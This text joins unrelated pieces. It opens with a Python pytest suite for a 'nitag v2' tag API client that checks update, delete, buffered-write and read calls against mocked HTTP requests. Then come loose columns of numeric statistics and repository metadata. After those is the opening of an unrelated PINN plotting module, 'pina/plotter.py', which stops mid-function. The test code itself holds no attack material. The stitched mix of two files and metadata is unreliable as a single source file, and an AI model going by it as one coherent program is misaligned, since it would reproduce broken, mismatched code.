all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
await self._uut.update_async(
[
tbase.TagDataUpdate.from_tagdata(
tag1, tbase.TagUpdateFields.PROPERTIES
),
tbase.TagDataUpdate.from_tagdata(tag2, tbase.TagUpdateFields.ALL),
]
)
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{"path": path1, "type": "BOOLEAN", "properties": properties},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": True,
},
)
@pytest.mark.asyncio
async def test__partial_success__update_async_with_tag_updates__raises(self):
path = "invalid"
error = core.ApiError()
error.name = ("Tag.OneOrMoreErrorsOccurred",)
error.message = ("One or more errors occurred",)
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = ("Tag.InvalidDataType",)
inner_errors[0].message = ("Invalid data type",)
inner_errors[0].resource_type = ("tag",)
inner_errors[0].resource_id = path
inner_errors[1].name = ("Tag.Conflict",)
inner_errors[1].message = ("Conflict of some sort",)
inner_errors[1].resource_type = ("tag",)
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
await self._uut.update_async(
[
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(path, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
)
]
)
assert error == ex.value.error
def test__bad_arguments__delete_tags__raises(self):
with pytest.raises(ValueError):
self._uut.delete(None)
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData("")])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData(" ")])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData("*")])
def test__delete_tags__deletes_using_paths(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None, None])
)
self._uut.delete(
[tbase.TagData(path1, tbase.DataType.STRING), tbase.TagData(path2)]
)
assert self._client.all_requests.call_args_list == [
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
]
def test__bad_arguments__delete_paths__raises(self):
with pytest.raises(ValueError):
self._uut.delete(None)
with pytest.raises(ValueError):
self._uut.delete(["tag", None])
with pytest.raises(ValueError):
self._uut.delete(["tag", ""])
with pytest.raises(ValueError):
self._uut.delete(["tag", " "])
with pytest.raises(ValueError):
self._uut.delete(["tag", "*"])
def test__empty_list__delete_paths__api_not_called(self):
self._uut.delete([])
assert self._client.all_requests.call_count == 0
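    # For small path lists the client deletes tags with one request per path,
    # so the tests below expect individual DELETE calls in order.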
def test__small_number_of_paths__delete_paths__separate_deletes_sent_to_server(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 6)
)
self._uut.delete([path1])
self._uut.delete([path1, path2])
self._uut.delete([path1, path2, path3])
assert self._client.all_requests.call_args_list == [
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3}),
]
def test__server_error_with_small_number_of_paths__delete_paths__raises_first_exception(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
deleteException = core.ApiException("oops")
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
# tag1
deleteException,
# tag1, tag2
None,
deleteException,
# tag1, tag2, tag3
deleteException,
deleteException,
deleteException,
]
)
)
with pytest.raises(core.ApiException) as ex:
self._uut.delete([path1])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
self._uut.delete([path1, path2])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
self._uut.delete([path1, path2, path3])
assert deleteException is ex.value
assert self._client.all_requests.call_args_list == [
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3}),
]
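    # For larger path lists the client is expected to avoid per-tag requests:
    # it creates a temporary server-side selection (POST /nitag/v2/selections
    # with a 30-second inactivity timeout), deletes the tags the selection
    # matches, and finally deletes the selection itself.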
def test__many_paths__delete_paths__temporary_selection_used_for_delete(self):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
else:
return None, MockResponse(method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
self._uut.delete(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
def test__server_error_with_many_paths__delete_paths__raises(self):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
createException = core.ApiException("can't create")
deleteException = core.ApiException("can't delete")
self._client.all_requests.configure_mock(side_effect=createException)
with pytest.raises(core.ApiException) as ex:
self._uut.delete(paths)
assert createException is ex.value
        # Second attempt: the selection is created, but deleting its tags fails.
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if uri.endswith("/tags"):
raise deleteException
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
with pytest.raises(core.ApiException) as ex:
self._uut.delete(paths)
assert deleteException is ex.value
assert self._client.all_requests.call_args_list == [
# From the first attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
# From the second attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
def test__server_error_when_deleting_temp_selection__delete_paths__error_ignored(
self,
):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if not uri.endswith("/tags"):
raise core.ApiException("can't delete selection")
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
self._uut.delete(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
@pytest.mark.asyncio
async def test__bad_arguments__delete_tags_async__raises(self):
with pytest.raises(ValueError):
await self._uut.delete_async(None)
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData("")])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData(" ")])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData("*")])
@pytest.mark.asyncio
async def test__delete_tags_async__deletes_using_paths(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None, None])
)
await self._uut.delete_async(
[tbase.TagData(path1, tbase.DataType.STRING), tbase.TagData(path2)]
)
assert sorted(str(c) for c in self._client.all_requests.call_args_list) == [
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
]
@pytest.mark.asyncio
async def test__bad_arguments__delete_paths_async__raises(self):
with pytest.raises(ValueError):
await self._uut.delete_async(None)
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", None])
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", ""])
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", " "])
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", "*"])
@pytest.mark.asyncio
async def test__empty_list__delete_paths_async__api_not_called(self):
await self._uut.delete_async([])
assert self._client.all_requests.call_count == 0
@pytest.mark.asyncio
async def test__small_number_of_paths__delete_paths_async__separate_deletes_sent_to_server(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 6)
)
await asyncio.gather(
self._uut.delete_async([path1]),
self._uut.delete_async([path1, path2]),
self._uut.delete_async([path1, path2, path3]),
)
assert sorted(str(c) for c in self._client.all_requests.call_args_list) == [
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3})),
]
@pytest.mark.asyncio
async def test__server_error_with_small_number_of_paths__delete_paths_async__raises_first_exception(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
deleteException = core.ApiException("oops")
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
# tag1
deleteException,
# tag1, tag2
None,
deleteException,
# tag1, tag2, tag3
deleteException,
deleteException,
deleteException,
]
)
)
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async([path1])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async([path1, path2])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async([path1, path2, path3])
assert deleteException is ex.value
assert sorted(str(c) for c in self._client.all_requests.call_args_list) == [
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3})),
]
@pytest.mark.asyncio
async def test__many_paths__delete_paths_async__temporary_selection_used_for_delete(
self,
):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
else:
return None, MockResponse(method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
await self._uut.delete_async(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
@pytest.mark.asyncio
async def test__server_error_with_many_paths__delete_paths_async__raises(self):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
createException = core.ApiException("can't create")
deleteException = core.ApiException("can't delete")
self._client.all_requests.configure_mock(side_effect=createException)
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async(paths)
assert createException is ex.value
        # Second attempt: the selection is created, but deleting its tags fails.
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if uri.endswith("/tags"):
raise deleteException
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async(paths)
assert deleteException is ex.value
assert self._client.all_requests.call_args_list == [
# From the first attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
# From the second attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
@pytest.mark.asyncio
async def test__server_error_when_deleting_temp_selection__delete_paths_async__error_ignored(
self,
):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if not uri.endswith("/tags"):
raise core.ApiException("can't delete selection")
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
await self._uut.delete_async(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
def test__bad_arguments__create_writer__raises(self):
with pytest.raises(ValueError):
self._uut.create_writer(buffer_size=0)
with pytest.raises(ValueError):
self._uut.create_writer(max_buffer_time=timedelta(0))
with pytest.raises(ValueError):
self._uut.create_writer(buffer_size=0, max_buffer_time=timedelta(minutes=1))
with pytest.raises(ValueError):
self._uut.create_writer(buffer_size=1, max_buffer_time=timedelta(0))
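    # The writer tests below rely on two buffering behaviors: a writer created
    # with buffer_size flushes once that many writes accumulate, and a writer
    # created with max_buffer_time flushes from a background timer even when
    # the buffer is not yet full.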
def test__create_writer_with_buffer_size__sends_when_buffer_full(self):
path = "tag"
value1 = 1
value2 = 2
writer = self._uut.create_writer(buffer_size=2)
timestamp = datetime.now()
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
writer.write(path, tbase.DataType.INT32, value1, timestamp=timestamp)
writer.write(path, tbase.DataType.INT32, value2, timestamp=timestamp)
utctime = datetime.utcfromtimestamp(timestamp.timestamp()).isoformat() + "Z"
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value1)},
"timestamp": utctime,
},
{
"value": {"type": "INT", "value": str(value2)},
"timestamp": utctime,
},
],
},
],
)
def test__create_writer_with_buffer_time__sends_when_timer_elapsed(self):
path = "tag"
value = 1
writer = self._uut.create_writer(max_buffer_time=timedelta(milliseconds=50))
timestamp = datetime.now()
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
writer.write(path, tbase.DataType.INT32, value, timestamp=timestamp)
self._client.all_requests.assert_not_called()
        for _ in range(100):
if self._client.all_requests.call_count > 0:
break
time.sleep(0.01)
utctime = datetime.utcfromtimestamp(timestamp.timestamp()).isoformat() + "Z"
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value)},
"timestamp": utctime,
}
],
}
],
)
def test__create_writer_with_buffer_size_and_timer__obeys_both_settings(self):
path = "tag"
value1 = 1
value2 = 2
value3 = 3
writer1 = self._uut.create_writer(
buffer_size=2, max_buffer_time=timedelta(minutes=1)
)
writer2 = self._uut.create_writer(
buffer_size=2, max_buffer_time=timedelta(milliseconds=50)
)
timestamp = datetime.now()
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None, None])
)
writer1.write(path, tbase.DataType.INT32, value1, timestamp=timestamp)
writer1.write(path, tbase.DataType.INT32, value2, timestamp=timestamp)
utctime = datetime.utcfromtimestamp(timestamp.timestamp()).isoformat() + "Z"
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value1)},
"timestamp": utctime,
},
{
"value": {"type": "INT", "value": str(value2)},
"timestamp": utctime,
},
],
}
],
)
writer2.write(path, tbase.DataType.INT32, value3, timestamp=timestamp)
assert 1 == self._client.all_requests.call_count # same as before
        for _ in range(100):
if self._client.all_requests.call_count > 1:
break
time.sleep(0.01)
assert 2 == self._client.all_requests.call_count
assert self._client.all_requests.call_args_list[1] == mock.call(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value3)},
"timestamp": utctime,
}
],
}
],
)
def test__bad_arguments__read__raises(self):
with pytest.raises(ValueError):
self._uut.read(None, include_timestamp=True, include_aggregates=True)
with pytest.raises(ValueError):
self._uut.read("", include_timestamp=True, include_aggregates=True)
with pytest.raises(ValueError):
self._uut.read(" ", include_timestamp=True, include_aggregates=True)
with pytest.raises(ValueError):
self._uut.read("*", include_timestamp=True, include_aggregates=True)
def test__read_with_timestamp_and_aggregates__retrieves_all_data_from_server(self):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
},
"aggregates": {"count": 7},
}
]
)
)
result = self._uut.read(path, include_timestamp=True, include_aggregates=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert 7 == result.count
assert result.max is None
assert result.min is None
assert result.mean is None
def test__read_with_aggregates__allows_missing_timestamp(self):
path = "test"
value = 3.14
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {"value": {"type": "DOUBLE", "value": str(value)}},
"aggregates": {
"min": "-1.3",
"max": "8.9",
"count": 3,
"avg": 4.7,
},
}
]
)
)
result = self._uut.read(path, include_timestamp=False, include_aggregates=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.DOUBLE == result.data_type
assert value == result.value
assert result.timestamp is None
assert -1.3 == result.min
assert 8.9 == result.max
assert 3 == result.count
assert 4.7 == result.mean
def test__read_with_timestamp__does_not_query_aggregates(self):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
}
}
]
)
)
result = self._uut.read(path, include_timestamp=True, include_aggregates=False)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
def test__read_without_timestamp__retrieves_minimal_data_from_server(self):
path = "test"
value = "success"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"current": {"value": {"type": "STRING", "value": value}}}]
)
)
result = self._uut.read(path, include_timestamp=False, include_aggregates=False)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current/value", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert result.timestamp is None
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
def test__no_tag_value__read__returns_None(self):
path = "test"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 4)
)
assert (
self._uut.read(path, include_timestamp=True, include_aggregates=True)
is None
)
assert (
self._uut.read(path, include_timestamp=False, include_aggregates=True)
is None
)
assert (
self._uut.read(path, include_timestamp=True, include_aggregates=False)
is None
)
assert (
self._uut.read(path, include_timestamp=False, include_aggregates=False)
is None
)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
),
mock.call(
"GET",
"/nitag/v2/tags/{path}/values/current/value",
params={"path": path},
),
]
@pytest.mark.asyncio
async def test__bad_arguments__read_async__raises(self):
with pytest.raises(ValueError):
await self._uut.read_async(
None, include_timestamp=True, include_aggregates=True
)
with pytest.raises(ValueError):
await self._uut.read_async(
"", include_timestamp=True, include_aggregates=True
)
with pytest.raises(ValueError):
await self._uut.read_async(
" ", include_timestamp=True, include_aggregates=True
)
with pytest.raises(ValueError):
await self._uut.read_async(
"*", include_timestamp=True, include_aggregates=True
)
@pytest.mark.asyncio
async def test__read_async_with_timestamp_and_aggregates__retrieves_all_data_from_server(
self,
):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
},
"aggregates": {"count": 7},
}
]
)
)
result = await self._uut.read_async(
path, include_timestamp=True, include_aggregates=True
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert 7 == result.count
assert result.max is None
assert result.min is None
assert result.mean is None
@pytest.mark.asyncio
async def test__read_async_with_aggregates__allows_missing_timestamp(self):
path = "test"
value = 3.14
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {"value": {"type": "DOUBLE", "value": value}},
"aggregates": {
"min": "-1.3",
"max": "8.9",
"count": 3,
"avg": 4.7,
},
}
]
)
)
result = await self._uut.read_async(
path, include_timestamp=False, include_aggregates=True
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.DOUBLE == result.data_type
assert value == result.value
assert result.timestamp is None
assert -1.3 == result.min
assert 8.9 == result.max
assert 3 == result.count
assert 4.7 == result.mean
@pytest.mark.asyncio
async def test__read_async_with_timestamp__does_not_query_aggregates(self):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
}
}
]
)
)
result = await self._uut.read_async(
path, include_timestamp=True, include_aggregates=False
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
@pytest.mark.asyncio
async def test__read_async_without_timestamp__retrieves_minimal_data_from_server(
self,
):
path = "test"
value = "success"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"current": {"value": {"type": "STRING", "value": value}}}]
)
)
result = await self._uut.read_async(
path, include_timestamp=False, include_aggregates=False
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current/value", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert result.timestamp is None
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
@pytest.mark.asyncio
async def test__no_tag_value__read_async__returns_None(self):
path = "test"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 4)
)
assert (
await self._uut.read_async(
path, include_timestamp=True, include_aggregates=True
)
is None
)
assert (
await self._uut.read_async(
path, include_timestamp=False, include_aggregates=True
)
is None
)
assert (
await self._uut.read_async(
path, include_timestamp=True, include_aggregates=False
)
is None
)
assert (
await self._uut.read_async(
path, include_timestamp=False, include_aggregates=False
)
is None
)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
),
mock.call(
"GET",
"/nitag/v2/tags/{path}/values/current/value",
params={"path": path},
),
]
| 38.709302
| 104
| 0.53789
| 11,006
| 109,857
| 5.128839
| 0.02753
| 0.028522
| 0.046485
| 0.053199
| 0.975641
| 0.966677
| 0.956438
| 0.949777
| 0.934258
| 0.925152
| 0
| 0.016513
| 0.343474
| 109,857
| 2,837
| 105
| 38.722947
| 0.766139
| 0.001775
| 0
| 0.728235
| 0
| 0
| 0.09298
| 0.02384
| 0
| 0
| 0
| 0
| 0.138431
| 1
| 0.021569
| false
| 0
| 0.003922
| 0.000392
| 0.033333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c70d95660e691f66dc672fbed3f01cfd70d3b821
| 6,445
|
py
|
Python
|
pina/plotter.py
|
s274001/PINA
|
beb33f0da20581338c46f0c525775904b35a1130
|
[
"MIT"
] | null | null | null |
pina/plotter.py
|
s274001/PINA
|
beb33f0da20581338c46f0c525775904b35a1130
|
[
"MIT"
] | null | null | null |
pina/plotter.py
|
s274001/PINA
|
beb33f0da20581338c46f0c525775904b35a1130
|
[
"MIT"
] | null | null | null |
""" Module for plotting. """
import matplotlib
#matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
import numpy as np
import torch
from pina import LabelTensor
from pina import PINN
from .problem import SpatialProblem, TimeDependentProblem
#from pina.tdproblem1d import TimeDepProblem1D
class Plotter:
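    """Utility for visualizing PINN predictions against truth solutions."""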
def _plot_2D(self, obj, method='contourf'):
"""
"""
if not isinstance(obj, PINN):
raise RuntimeError
res = 256
pts = obj.problem.spatial_domain.discretize(res, 'grid')
grids_container = [
pts[:, 0].reshape(res, res),
pts[:, 1].reshape(res, res),
]
pts = LabelTensor(torch.tensor(pts), obj.problem.input_variables)
predicted_output = obj.model(pts.tensor)
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
cb = getattr(axes, method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
def _plot_1D_TimeDep(self, obj, method='contourf'):
"""
"""
if not isinstance(obj, PINN):
raise RuntimeError
res = 256
grids_container = np.meshgrid(
obj.problem.spatial_domain.discretize(res, 'grid'),
obj.problem.temporal_domain.discretize(res, 'grid'),
)
pts = np.hstack([
grids_container[0].reshape(-1, 1),
grids_container[1].reshape(-1, 1),
])
pts = LabelTensor(torch.tensor(pts), obj.problem.input_variables)
predicted_output = obj.model(pts.tensor)
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
